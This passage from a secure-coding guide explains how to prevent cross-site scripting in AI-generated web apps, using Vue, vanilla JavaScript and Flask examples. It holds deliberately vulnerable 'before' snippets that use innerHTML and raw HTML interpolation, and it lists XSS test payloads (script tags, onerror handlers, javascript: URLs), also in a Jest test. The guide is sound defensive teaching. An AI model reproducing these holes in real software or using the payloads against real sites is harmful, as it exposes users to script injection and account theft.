        {{ submitting ? 'Posting...' : 'Post Comment' }}
      </button>
    </form>
  </div>
</template>

<script>
import DOMPurify from 'dompurify';

export default {
  data() {
    return {
      comments: [],
      newComment: '',
      loading: true,
      error: null,
      submitting: false,
      maxCommentLength: 1000
    };
  },
  
  mounted() {
    this.fetchComments();
  },
  
  methods: {
    fetchComments() {
      this.loading = true;
      this.error = null;
      
      fetch('/api/comments')
        .then(res => {
          if (!res.ok) {
            throw new Error('Failed to load comments');
          }
          return res.json();
        })
        .then(data => {
          this.comments = data;
          this.loading = false;
        })
        .catch(err => {
          this.error = err.message;
          this.loading = false;
        });
    },
    
    submitComment() {
      if (!this.newComment.trim()) {
        return;
      }
      
      this.submitting = true;
      
      fetch('/api/comments', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: this.newComment
        })
      })
        .then(res => {
          if (!res.ok) {
            throw new Error('Failed to post comment');
          }
          return res.json();
        })
        .then(() => {
          this.newComment = '';
          this.fetchComments();
          this.submitting = false;
        })
        .catch(err => {
          this.error = err.message;
          this.submitting = false;
        });
    },
    
    sanitizeHtml(html) {
      return DOMPurify.sanitize(html, {
        ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
        ALLOWED_ATTR: ['href', 'target', 'rel']
      });
    },
    
    sanitizeUrl(url) {
      // Validate URL
      try {
        const parsedUrl = new URL(url);
        if (['http:', 'https:'].includes(parsedUrl.protocol)) {
          return url;
        }
        return '/default-avatar.png'; // Fallback to default
      } catch (e) {
        return '/default-avatar.png'; // Fallback to default
      }
    },
    
    formatDate(dateString) {
      const date = new Date(dateString);
      return date.toLocaleDateString();
    }
  }
};
</script>

This implementation uses DOMPurify for HTML sanitization and proper URL validation.

Base44 Secure Implementation

For Base44’s vanilla JavaScript applications:

// Secure Base44 DOM manipulation
document.addEventListener('DOMContentLoaded', () => {
  // Helper functions for security
  function escapeHtml(unsafe) {
    return unsafe
      .replace(/&/g, '&amp;')
      .replace(/</g, '&lt;')
      .replace(/>/g, '&gt;')
      .replace(/"/g, '&quot;')
      .replace(/'/g, '&#039;');
  }
  
  function sanitizeUrl(url) {
    try {
      const parsedUrl = new URL(url);
      return ['http:', 'https:'].includes(parsedUrl.protocol) ? url : '#';
    } catch (e) {
      return '#';
    }
  }
  
  // Get URL parameters safely
  const urlParams = new URLSearchParams(window.location.search);
  const username = urlParams.get('username');
  
  // Safe: Using textContent instead of innerHTML
  if (username) {
    const welcomeMessage = document.getElementById('welcome-message');
    welcomeMessage.textContent = `Welcome back, ${username}!`;
  }
  
  // Load and display user comments safely
  function loadComments() {
    const commentsContainer = document.getElementById('comments');
    commentsContainer.innerHTML = '<p>Loading comments...</p>';
    
    fetch('/api/comments')
      .then(response => {
        if (!response.ok) {
          throw new Error('Failed to load comments');
        }
        return response.json();
      })
      .then(comments => {
        commentsContainer.innerHTML = '';
        
        if (comments.length === 0) {
          const noCommentsElement = document.createElement('p');
          noCommentsElement.textContent = 'No comments yet. Be the first to comment!';
          commentsContainer.appendChild(noCommentsElement);
          return;
        }
        
        // Create comments safely using DOM API
        comments.forEach(comment => {
          // Create elements
          const commentElement = document.createElement('div');
          commentElement.className = 'comment';
          
          const headerElement = document.createElement('div');
          headerElement.className = 'comment-header';
          
          const avatarElement = document.createElement('img');
          avatarElement.src = sanitizeUrl(comment.authorAvatar);
          avatarElement.alt = 'Avatar';
          avatarElement.className = 'avatar';
          
          const authorElement = document.createElement('h3');
          authorElement.textContent = comment.authorName;
          
          const bodyElement = document.createElement('div');
          bodyElement.className = 'comment-body';
          bodyElement.textContent = comment.content;
          
          const footerElement = document.createElement('div');
          footerElement.className = 'comment-footer';
          
          const dateElement = document.createElement('span');
          dateElement.textContent = new Date(comment.createdAt).toLocaleDateString();
          
          // Assemble the elements
          headerElement.appendChild(avatarElement);
          headerElement.appendChild(authorElement);
          
          footerElement.appendChild(dateElement);
          
          commentElement.appendChild(headerElement);
          commentElement.appendChild(bodyElement);
          commentElement.appendChild(footerElement);
          
          commentsContainer.appendChild(commentElement);
        });
      })
      .catch(error => {
        commentsContainer.innerHTML = `<p class="error">Error: ${escapeHtml(error.message)}</p>`;
      });
  }
  
  // Load comments on page load
  loadComments();
  
  // Handle comment form submission
  const commentForm = document.getElementById('comment-form');
  if (commentForm) {
    commentForm.addEventListener('submit', event => {
      event.preventDefault();
      
      const commentInput = document.getElementById('comment-input');
      const commentContent = commentInput.value.trim();
      
      if (!commentContent) {
        return;
      }
      
      // Disable form during submission
      const submitButton = commentForm.querySelector('button[type="submit"]');
      submitButton.disabled = true;
      submitButton.textContent = 'Posting...';
      
      // Submit comment to API
      fetch('/api/comments', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify({
          content: commentContent
        })
      })
        .then(response => {
          if (!response.ok) {
            throw new Error('Failed to post comment');
          }
          return response.json();
        })
        .then(() => {
          commentInput.value = '';
          loadComments();
          
          // Re-enable form
          submitButton.disabled = false;
          submitButton.textContent = 'Post Comment';
        })
        .catch(error => {
          const errorElement = document.createElement('p');
          errorElement.className = 'error';
          errorElement.textContent = `Error: ${error.message}`;
          
          commentForm.appendChild(errorElement);
          
          // Re-enable form
          submitButton.disabled = false;
          submitButton.textContent = 'Post Comment';
          
          // Remove error message after 5 seconds
          setTimeout(() => {
            if (errorElement.parentNode === commentForm) {
              commentForm.removeChild(errorElement);
            }
          }, 5000);
        });
    });
  }
});

This implementation uses textContent instead of innerHTML and builds DOM elements programmatically.

Replit Secure Implementation

For Replit’s Python Flask applications:

# Secure Replit Flask application
from flask import Flask, request, render_template, redirect, url_for
import sqlite3
import bleach
import re
from markupsafe import escape

app = Flask(__name__)

# Database setup
def get_db_connection():
    conn = sqlite3.connect('database.db')
    conn.row_factory = sqlite3.Row
    return conn

# URL validation
def is_valid_url(url):
    url_pattern = re.compile(
        r'^https?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+[A-Z]{2,6}\.?|'  # domain
        r'localhost|'  # localhost
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # or IP
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
    
    return url_pattern.match(url) is not None

# HTML sanitization
def sanitize_html(content):
    # Define allowed tags and attributes
    allowed_tags = ['b', 'i', 'em', 'strong', 'a', 'p', 'br']
    allowed_attrs = {
        'a': ['href', 'target', 'rel']
    }
    
    # Sanitize HTML
    clean_html = bleach.clean(
        content,
        tags=allowed_tags,
        attributes=allowed_attrs,
        strip=True
    )
    
    # Ensure generated links open in a new tab with safe rel attributes
    def set_link_attrs(attrs, new=False):
        href = attrs.get((None, 'href'), '')
        if href.startswith(('http:', 'https:')):
            attrs[(None, 'target')] = '_blank'
            attrs[(None, 'rel')] = 'noopener noreferrer'
        return attrs
    
    clean_html = bleach.linkify(clean_html, callbacks=[set_link_attrs])
    
    return clean_html

# Safe search route
@app.route('/search')
def search():
    query = request.args.get('q', '')
    
    conn = get_db_connection()
    results = conn.execute(
        'SELECT * FROM products WHERE name LIKE ? OR description LIKE ?',
        (f'%{query}%', f'%{query}%')
    ).fetchall()
    conn.close()
    
    # Use a proper template file instead of template string
    return render_template(
        'search_results.html',
        query=query,
        results=results
    )

# Safe post display and comment submission
@app.route('/post/<int:post_id>', methods=['GET', 'POST'])
def post(post_id):
    error = None
    
    if request.method == 'POST':
        author = request.form.get('author', 'Anonymous').strip()
        content = request.form.get('content', '').strip()
        
        # Validate inputs
        if not content:
            error = 'Comment content is required'
        elif len(content) > 1000:
            error = 'Comment is too long (maximum 1000 characters)'
        elif len(author) > 50:
            error = 'Author name is too long (maximum 50 characters)'
        else:
            # Sanitize inputs
            author = escape(author)
            
            # Determine if HTML is allowed
            allow_html = request.form.get('allow_html') == 'yes'
            
            if allow_html:
                content = sanitize_html(content)
            else:
                content = escape(content)
            
            # Store in database
            conn = get_db_connection()
            conn.execute(
                'INSERT INTO comments (post_id, author, content, allow_html) VALUES (?, ?, ?, ?)',
                (post_id, author, content, allow_html)
            )
            conn.commit()
            conn.close()
            
            return redirect(url_for('post', post_id=post_id))
    
    # Get post and comments
    conn = get_db_connection()
    post = conn.execute('SELECT * FROM posts WHERE id = ?', (post_id,)).fetchone()
    comments = conn.execute('SELECT * FROM comments WHERE post_id = ?', (post_id,)).fetchall()
    conn.close()
    
    if not post:
        return 'Post not found', 404
    
    # Use a proper template file
    return render_template(
        'post.html',
        post=post,
        comments=comments,
        error=error
    )

# In templates/search_results.html
"""
<!DOCTYPE html>
<html>
<head>
    <title>Search Results</title>
</head>
<body>
    <h1>Search Results for: {{ query }}</h1>
    
    {% if results %}
        <ul>
        {% for result in results %}
            <li>
                <h2>{{ result['name'] }}</h2>
                <p>{{ result['description'] }}</p>
            </li>
        {% endfor %}
        </ul>
    {% else %}
        <p>No results found for "{{ query }}"</p>
    {% endif %}
    
    <a href="/">Back to Home</a>
</body>
</html>
"""

# In templates/post.html
"""
<!DOCTYPE html>
<html>
<head>
    <title>{{ post['title'] }}</title>
</head>
<body>
    <h1>{{ post['title'] }}</h1>
    <div>{{ post['content'] }}</div>
    
    <h2>Comments</h2>
    {% if comments %}
        {% for comment in comments %}
            <div class="comment">
                <h3>{{ comment['author'] }}</h3>
                {% if comment['allow_html'] %}
                    <p>{{ comment['content']|safe }}</p>
                {% else %}
                    <p>{{ comment['content'] }}</p>
                {% endif %}
            </div>
        {% endfor %}
    {% else %}
        <p>No comments yet.</p>
    {% endif %}
    
    <h2>Add a Comment</h2>
    {% if error %}
        <p class="error">{{ error }}</p>
    {% endif %}
    <form method="post">
        <div>
            <label for="author">Name:</label>
            <input type="text" id="author" name="author">
        </div>
        <div>
            <label for="content">Comment:</label>
            <textarea id="content" name="content"></textarea>
        </div>
        <div>
            <label>
                <input type="checkbox" name="allow_html" value="yes">
                Allow basic HTML formatting
            </label>
        </div>
        <button type="submit">Post Comment</button>
    </form>
</body>
</html>
"""

This implementation uses proper templates, input validation, and HTML sanitization with bleach.

Testing for XSS Vulnerabilities

Identifying XSS vulnerabilities is crucial for securing your vibe-coded applications. Here are several approaches to testing:

Manual Testing

Basic manual testing involves trying common XSS payloads:

  1. Basic script injection: Try inserting script tags

    • Example: <script>alert('XSS')</script>
  2. Event handler injection: Try inserting event handlers

    • Example: <img src="x" onerror="alert('XSS')">
    • Example: <body onload="alert('XSS')">
  3. JavaScript URL injection: Try using javascript: URLs

    • Example: <a href="javascript:alert('XSS')">Click me</a>
  4. CSS injection: Try injecting CSS with JavaScript

    • Example: <div style="background-image: url('javascript:alert(\'XSS\')')"></div>
  5. HTML5 vectors: Try using newer HTML5 features

    • Example: <svg onload="alert('XSS')">
    • Example: <video><source onerror="alert('XSS')">

Automated Testing Tools

Several tools can help identify XSS vulnerabilities:

  1. OWASP ZAP: An integrated penetration testing tool

    • Use the automated scanner
    • Use the active scan specifically for XSS
  2. Burp Suite: A comprehensive web application security testing platform

    • Use the scanner feature to detect vulnerabilities
    • Use the intruder feature for custom payload testing
  3. XSS Hunter: A platform for finding blind XSS vulnerabilities

    • Create payloads that report back when executed
    • Useful for finding stored XSS that may not be immediately visible

Integration Testing

Implement automated tests that specifically check for XSS:

// Example Jest test for XSS vulnerability (supertest driving the Express app)
const request = require('supertest');
const app = require('../app'); // hypothetical path to the exported Express app

describe('Comment Submission', () => {
  test('Should handle XSS attempts safely', async () => {
    const xssPayloads = [
      '<script>alert("XSS")</script>',
      '<img src="x" onerror="alert(\'XSS\')">',
      '<a href="javascript:alert(\'XSS\')">Click me</a>',
      '<svg onload="alert(\'XSS\')"></svg>',
      '"><script>alert("XSS")</script>'
    ];
    
    for (const payload of xssPayloads) {
      // Submit a comment with XSS payload
      await request(app)
        .post('/comments')
        .send({
          author: 'Test User',
          content: payload
        })
        .expect(201);
      
      // Get the page that displays comments
      const response = await request(app)
        .get('/post/1')
        .expect(200);
      
      // Verify the response doesn't contain unescaped XSS payload
      expect(response.text).not.toContain(payload);
      
      // Check that script tags are escaped or removed
      expect(response.text).not.toContain('<script>');
      
      // Check that event handlers are removed
      expect(response.text).not.toMatch(/onerror\s*=|onload\s*=/i);
      
      // Check that javascript: URLs are removed or sanitized
      expect(response.text).not.toMatch(/href\s*=\s*["']javascript:/i);
    }
  });
});

Content Security Policy Testing

Test your Content Security Policy implementation:

  1. CSP Evaluator: Use Google’s CSP Evaluator to check your policy

  2. Browser Developer Tools: Check for CSP violations in the console

  3. CSP Report-Only mode: Use report-only mode to test policy changes

    app.use((req, res, next) => {
      res.setHeader(
        'Content-Security-Policy-Report-Only',
        "default-src 'self'; report-uri /csp-report"
      );
      next();
    });
    
    app.post('/csp-report', (req, res) => {
      console.log('CSP Violation:', req.body);
      res.status(204).end();
    });

Best Practices for Preventing XSS

To prevent XSS in vibe-coded applications, follow these best practices:

1. Use Specific Prompts for Security

When using AI tools to generate frontend code, include security requirements in your prompts:

Instead of:

Create a comment display component

Use:

Create a secure comment display component that properly escapes or sanitizes user-generated content to prevent XSS attacks. Use textContent instead of innerHTML where possible, and when HTML formatting is needed, use a sanitization library like DOMPurify.

2. Always Encode Output

Never output user-provided data without proper encoding:

  • Use framework-provided encoding (React’s automatic escaping, Vue’s text interpolation)
  • Use textContent instead of innerHTML for DOM manipulation
  • Use dedicated encoding functions for different contexts (HTML, JavaScript, CSS, URLs), as sketched below
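
As a rough sketch of context-specific encoding, the helpers below reuse the escapeHtml function from the Output Encoding section and lean on standard APIs (encodeURIComponent for URL components, JSON.stringify for values embedded in scripts); which helpers you need depends on where the data ends up:

// Context-specific encoding sketch: pick the encoder that matches the sink
// (escapeHtml is the helper defined in the Output Encoding section above)

function encodeForUrlComponent(value) {
  // For query-string keys and values
  return encodeURIComponent(value);
}

function encodeForJsString(value) {
  // JSON.stringify yields a safely quoted JavaScript string literal,
  // suitable for embedding a value in a generated <script> block
  return JSON.stringify(String(value));
}

function buildSearchLink(query) {
  return `/search?q=${encodeForUrlComponent(query)}`;
}

function buildGreeting(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}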

3. Use Content Security Policy

Implement a strong Content Security Policy:

  • Avoid 'unsafe-inline' so that inline scripts and styles are blocked
  • Specify trusted sources for scripts, styles, images, etc.
  • Use nonces or hashes for necessary inline scripts (see the sketch after this list)
  • Enable reporting to monitor violations
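
A minimal Express sketch of a nonce-based policy, assuming a fresh nonce is generated for each response and exposed to the template engine so that only the intended inline script is allowed to run:

// Nonce-based CSP sketch for Express
const crypto = require('crypto');

app.use((req, res, next) => {
  // Generate a fresh, unguessable nonce for every response
  const nonce = crypto.randomBytes(16).toString('base64');
  res.locals.cspNonce = nonce;
  
  res.setHeader(
    'Content-Security-Policy',
    `default-src 'self'; script-src 'self' 'nonce-${nonce}'; object-src 'none'`
  );
  
  next();
});

// In the template, only inline scripts carrying the matching nonce execute,
// e.g. with EJS: <script nonce="<%= cspNonce %>">initApp();</script>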

4. Sanitize HTML When Needed

When HTML formatting is required:

  • Use a dedicated sanitization library (DOMPurify, sanitize-html, bleach)
  • Whitelist allowed tags and attributes
  • Remove or encode potentially dangerous content
  • Validate URLs to prevent javascript: URLs

5. Validate Input

Validate all user inputs:

  • Validate data types, formats, and ranges
  • Reject unexpected or malformed inputs
  • Apply context-specific validation (email formats, URLs, etc.)
  • Combine validation with sanitization
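
A minimal sketch with express-validator (the route and field names are illustrative):

const { body, validationResult } = require('express-validator');

app.post('/signup', [
  body('email').isEmail().normalizeEmail(),
  body('website').optional().isURL({ protocols: ['http', 'https'] }),
  body('displayName').trim().isLength({ min: 1, max: 50 }).escape()
], (req, res) => {
  const errors = validationResult(req);
  if (!errors.isEmpty()) {
    // Reject malformed input instead of trying to repair it
    return res.status(400).json({ errors: errors.array() });
  }
  
  // Proceed with validated, sanitized values
  res.status(201).json({ message: 'Account created' });
});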

6. Use Framework Protections

Leverage built-in protections in modern frameworks:

  • React: Avoid dangerouslySetInnerHTML
  • Vue: Avoid v-html
  • Angular: Rely on Angular’s built-in sanitization for [innerHTML] and avoid bypassSecurityTrustHtml
  • Server-side templates: Use auto-escaping features
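
For instance, in React (component and prop names here are illustrative), interpolated values are escaped automatically, and the rare cases that need raw HTML should pass through a sanitizer first:

import DOMPurify from 'dompurify';

// Safe by default: React escapes interpolated values
function Comment({ author, text }) {
  return (
    <div className="comment">
      <h3>{author}</h3>
      <p>{text}</p>
    </div>
  );
}

// Only when rich formatting is required, sanitize before using dangerouslySetInnerHTML
function RichComment({ html }) {
  const clean = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'br']
  });
  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}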

7. Implement Defense in Depth

Don’t rely on a single protection measure:

  • Combine input validation, output encoding, and CSP
  • Use HTTP security headers (X-Content-Type-Options, X-Frame-Options; note that X-XSS-Protection is deprecated in modern browsers)
  • Implement proper CORS policies
  • Use HTTPS to prevent traffic interception
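
A minimal Express sketch that layers additional headers on top of CSP and output encoding (the values shown are common defaults, not a complete configuration):

app.use((req, res, next) => {
  // Complement CSP with additional security headers
  res.setHeader('X-Content-Type-Options', 'nosniff');
  res.setHeader('X-Frame-Options', 'DENY');
  res.setHeader('Referrer-Policy', 'no-referrer');
  // HSTS only takes effect when the site is already served over HTTPS
  res.setHeader('Strict-Transport-Security', 'max-age=31536000; includeSubDomains');
  next();
});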

8. Regular Security Testing

Continuously test for XSS vulnerabilities:

  • Include XSS testing in your CI/CD pipeline
  • Perform regular security audits
  • Use both automated tools and manual testing
  • Consider bug bounty programs for external testing

Real-World Scenarios and Solutions

Let’s examine some real-world XSS scenarios in vibe-coded applications and their solutions.

Scenario 1: Vulnerable Comment System

Problem: A vibe-coded blog platform allows users to post comments, but the comments are rendered directly using innerHTML without sanitization.

Solution:

  1. Implement proper sanitization:

    // Before: Vulnerable code
    function displayComments(comments) {
      const commentsContainer = document.getElementById('comments');
      
      let html = '';
      comments.forEach(comment => {
        html += `
          <div class="comment">
            <h3>${comment.author}</h3>
            <p>${comment.content}</p>
          </div>
        `;
      });
      
      commentsContainer.innerHTML = html;
    }
    
    // After: Secure code with DOMPurify (loaded via a bundler import or a <script> tag)
    function displayComments(comments) {
      const commentsContainer = document.getElementById('comments');
      
      // Clear existing comments
      commentsContainer.innerHTML = '';
      
      comments.forEach(comment => {
        const commentElement = document.createElement('div');
        commentElement.className = 'comment';
        
        const authorElement = document.createElement('h3');
        authorElement.textContent = comment.author;
        
        const contentElement = document.createElement('p');
        
        // If HTML is allowed, sanitize it
        if (comment.allowHtml) {
          contentElement.innerHTML = DOMPurify.sanitize(comment.content, {
            ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'br'],
            ALLOWED_ATTR: ['href', 'target', 'rel']
          });
        } else {
          // Otherwise, use plain text
          contentElement.textContent = comment.content;
        }
        
        commentElement.appendChild(authorElement);
        commentElement.appendChild(contentElement);
        
        commentsContainer.appendChild(commentElement);
      });
    }
  2. Add server-side validation and sanitization:

    const { body, validationResult } = require('express-validator');
    const { escape } = require('validator'); // HTML-entity escaping for plain-text fields
    const createDOMPurify = require('dompurify');
    const { JSDOM } = require('jsdom');
    
    app.post('/comments', [
      body('author')
        .trim()
        .isLength({ min: 1, max: 50 })
        .withMessage('Author name must be between 1 and 50 characters')
        .escape(),
      
      body('content')
        .trim()
        .isLength({ min: 1, max: 1000 })
        .withMessage('Comment must be between 1 and 1000 characters')
    ], (req, res) => {
      // Check for validation errors
      const errors = validationResult(req);
      if (!errors.isEmpty()) {
        return res.status(400).json({ errors: errors.array() });
      }
      
      const { author, content, allowHtml } = req.body;
      
      // Sanitize content if HTML is allowed
      let sanitizedContent = content;
      if (allowHtml === true) {
        const window = new JSDOM('').window;
        const DOMPurify = createDOMPurify(window);
        
        sanitizedContent = DOMPurify.sanitize(content, {
          ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'br'],
          ALLOWED_ATTR: ['href', 'target', 'rel']
        });
      } else {
        // Escape HTML entities for plain-text comments (validator's escape, not the deprecated global escape)
        sanitizedContent = escape(content);
      }
      
      // Store sanitized content in database
      db.query(
        'INSERT INTO comments (author, content, allow_html) VALUES (?, ?, ?)',
        [author, sanitizedContent, allowHtml === true]
      );
      
      res.status(201).json({ message: 'Comment added successfully' });
    });

Scenario 2: Vulnerable Search Results

Problem: A vibe-coded e-commerce site displays search results with highlighted query terms, but the highlighting is implemented unsafely.

Solution:

  1. Implement safe highlighting:

    // Before: Vulnerable code
    function highlightSearchTerm(text, searchTerm) {
      if (!searchTerm) return text;
      
      const regex = new RegExp(`(${searchTerm})`, 'gi');
      return text.replace(regex, '<mark>$1</mark>');
    }
    
    function displaySearchResults(results, searchTerm) {
      const resultsContainer = document.getElementById('results');
      
      let html = '';
      results.forEach(result => {
        html += `
          <div class="result">
            <h3>${result.title}</h3>
            <p>${highlightSearchTerm(result.description, searchTerm)}</p>
          </div>
        `;
      });
      
      resultsContainer.innerHTML = html;
    }
    
    // After: Secure code with proper escaping
    function highlightSearchTerm(text, searchTerm) {
      if (!searchTerm || !text) return text;
      
      // First, escape the text
      const escapeHtml = (str) => {
        return str
          .replace(/&/g, '&amp;')
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#039;');
      };
      
      const escapedText = escapeHtml(text);
      
      // Escape the search term for use in regex
      const escapeRegExp = (str) => {
        return str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
      };
      
      const escapedSearchTerm = escapeRegExp(searchTerm);
      
      // Highlight matches
      const regex = new RegExp(`(${escapedSearchTerm})`, 'gi');
      return escapedText.replace(regex, '<mark>$1</mark>');
    }
    
    function displaySearchResults(results, searchTerm) {
      const resultsContainer = document.getElementById('results');
      
      // Clear existing results
      resultsContainer.innerHTML = '';
      
      if (results.length === 0) {
        const noResultsElement = document.createElement('p');
        noResultsElement.textContent = `No results found for "${searchTerm}"`;
        resultsContainer.appendChild(noResultsElement);
        return;
      }
      
      results.forEach(result => {
        const resultElement = document.createElement('div');
        resultElement.className = 'result';
        
        const titleElement = document.createElement('h3');
        titleElement.textContent = result.title;
        
        const descriptionElement = document.createElement('p');
        
        // Use DOMPurify to sanitize the highlighted HTML
        const highlightedText = highlightSearchTerm(result.description, searchTerm);
        descriptionElement.innerHTML = DOMPurify.sanitize(highlightedText, {
          ALLOWED_TAGS: ['mark']
        });
        
        resultElement.appendChild(titleElement);
        resultElement.appendChild(descriptionElement);
        
        resultsContainer.appendChild(resultElement);
      });
    }
  2. Implement server-side highlighting:

    const { escape } = require('validator'); // HTML-entity escaping
    
    app.get('/api/search', (req, res) => {
      const searchTerm = req.query.q || '';
      
      // Perform search in database
      db.query(
        'SELECT * FROM products WHERE name LIKE ? OR description LIKE ?',
        [`%${searchTerm}%`, `%${searchTerm}%`],
        (err, results) => {
          if (err) {
            return res.status(500).json({ error: 'Database error' });
          }
          
          // Process results to add safe highlighting
          const processedResults = results.map(result => {
            // Create a safe copy of the result
            const processed = { ...result };
            
            // Add highlighted description if search term exists
            if (searchTerm) {
              // Escape HTML in the description
              const escapedDescription = escape(result.description);
              
              // Escape the search term for use in regex
              const escapeRegExp = (str) => {
                return str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
              };
              
              const escapedSearchTerm = escapeRegExp(searchTerm);
              
              // Highlight matches
              const regex = new RegExp(`(${escapedSearchTerm})`, 'gi');
              processed.highlightedDescription = escapedDescription.replace(
                regex, 
                '<mark>$1</mark>'
              );
            } else {
              processed.highlightedDescription = escape(result.description);
            }
            
            return processed;
          });
          
          res.json(processedResults);
        }
      );
    });

Scenario 3: Vulnerable Profile Page

Problem: A vibe-coded social network allows users to customize their profile with HTML, but doesn’t properly sanitize the content.

Solution:

  1. Implement strict HTML sanitization:

    // Before: Vulnerable code
    app.post('/profile/update', (req, res) => {
      const { bio, interests, socialLinks } = req.body;
      
      // Update user profile in database
      db.query(
        'UPDATE users SET bio = ?, interests = ?, social_links = ? WHERE id = ?',
        [bio, interests, JSON.stringify(socialLinks), req.user.id]
      );
      
      res.redirect('/profile');
    });
    
    app.get('/profile/:username', (req, res) => {
      const { username } = req.params;
      
      db.query(
        'SELECT * FROM users WHERE username = ?',
        [username],
        (err, results) => {
          if (err || results.length === 0) {
            return res.status(404).send('User not found');
          }
          
          const user = results[0];
          
          // Vulnerable: Directly inserting user data into HTML
          res.send(`
            <h1>${user.username}'s Profile</h1>
            <div class="bio">${user.bio}</div>
            <div class="interests">${user.interests}</div>
            <div class="social-links">${user.social_links}</div>
          `);
        }
      );
    });
    
    // After: Secure code with validation and sanitization
    const { body, validationResult } = require('express-validator');
    const createDOMPurify = require('dompurify');
    const { JSDOM } = require('jsdom');
    
    // Create DOMPurify instance
    const window = new JSDOM('').window;
    const DOMPurify = createDOMPurify(window);
    
    // Configure allowed tags and attributes
    const ALLOWED_TAGS = [
      'b', 'i', 'em', 'strong', 'a', 'p', 'br', 'ul', 'ol', 'li', 'h2', 'h3', 'blockquote'
    ];
    
    // DOMPurify expects ALLOWED_ATTR as a flat list of attribute names
    const ALLOWED_ATTR = ['href', 'target', 'rel'];
    
    // URL validation
    function isValidUrl(url) {
      try {
        const parsedUrl = new URL(url);
        return ['http:', 'https:'].includes(parsedUrl.protocol);
      } catch (e) {
        return false;
      }
    }
    
    app.post('/profile/update', [
      body('bio')
        .trim()
        .isLength({ max: 5000 })
        .withMessage('Bio must be less than 5000 characters'),
      
      body('interests')
        .trim()
        .isLength({ max: 1000 })
        .withMessage('Interests must be less than 1000 characters'),
      
      body('socialLinks.*.url')
        .custom(url => {
          if (!url) return true;
          return isValidUrl(url);
        })
        .withMessage('Social links must be valid URLs')
    ], (req, res) => {
      // Check for validation errors
      const errors = validationResult(req);
      if (!errors.isEmpty()) {
        return res.status(400).json({ errors: errors.array() });
      }
      
      const { bio, interests, socialLinks } = req.body;
      
      // Sanitize HTML content
      const sanitizedBio = DOMPurify.sanitize(bio, {
        ALLOWED_TAGS,
        ALLOWED_ATTR
      });
      
      const sanitizedInterests = DOMPurify.sanitize(interests, {
        ALLOWED_TAGS,
        ALLOWED_ATTR
      });
      
      // Validate and sanitize social links
      const sanitizedSocialLinks = socialLinks.filter(link => {
        return link.url && isValidUrl(link.url);
      }).map(link => ({
        platform: DOMPurify.sanitize(link.platform, { ALLOWED_TAGS: [] }),
        // The URL was already validated; strip any markup just in case
        url: DOMPurify.sanitize(link.url, { ALLOWED_TAGS: [] })
      }));
      
      // Update user profile in database
      db.query(
        'UPDATE users SET bio = ?, interests = ?, social_links = ? WHERE id = ?',
        [sanitizedBio, sanitizedInterests, JSON.stringify(sanitizedSocialLinks), req.user.id]
      );
      
      res.redirect('/profile');
    });
    
    app.get('/profile/:username', (req, res) => {
      const { username } = req.params;
      
      db.query(
        'SELECT * FROM users WHERE username = ?',
        [username],
        (err, results) => {
          if (err || results.length === 0) {
            return res.status(404).send('User not found');
          }
          
          const user = results[0];
          
          // Parse social links
          let socialLinks = [];
          try {
            socialLinks = JSON.parse(user.social_links);
          } catch (e) {
            socialLinks = [];
          }
          
          // Render using a template engine with auto-escaping
          res.render('profile', {
            username: user.username,
            bio: user.bio, // Already sanitized when stored
            interests: user.interests, // Already sanitized when stored
            socialLinks: socialLinks // Already validated when stored
          });
        }
      );
    });
  2. Implement Content Security Policy:

    app.use((req, res, next) => {
      // Set Content Security Policy header
      res.setHeader(
        'Content-Security-Policy',
        "default-src 'self'; " +
        "script-src 'self'; " +
        "style-src 'self' https://fonts.googleapis.com; " +
        "font-src 'self' https://fonts.gstatic.com; " +
        "img-src 'self' https://images.unsplash.com data:; " +
        "connect-src 'self' https://api.example.com; " +
        "frame-src 'none'; " +
        "object-src 'none'"
      );
      
      next();
    });

Conclusion

Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous web application vulnerabilities, and vibe-coded applications are particularly susceptible due to the tendency of AI tools to prioritize functionality over security. By understanding how AI tools generate frontend code and the common patterns that lead to XSS vulnerabilities, you can take proactive steps to secure your applications.

The key principles for preventing XSS in vibe-coded applications include:

  1. Always encode output to prevent script execution
  2. Use DOM API methods instead of innerHTML when possible
  3. Implement a strong Content Security Policy as an additional layer of defense
  4. Sanitize HTML content when rich formatting is required
  5. Validate all user inputs before processing or storing them
  6. Leverage built-in framework protections like React’s automatic escaping
  7. Implement defense in depth with multiple security measures
  8. Regularly test for XSS vulnerabilities using both manual and automated approaches

Each full-stack app builder—Lovable.dev, Bolt.new, Tempo Labs, Base44, and Replit—has its own frontend code generation patterns and potential vulnerabilities. By applying platform-specific security enhancements and following best practices, you can ensure that your vibe-coded applications maintain robust protection against XSS while still benefiting from the rapid development that AI tools enable.

Remember that a single XSS vulnerability can compromise your users’ accounts, steal sensitive information, or spread malware. Investing time in securing your frontend code will protect your users and your reputation from the devastating consequences of a successful attack.
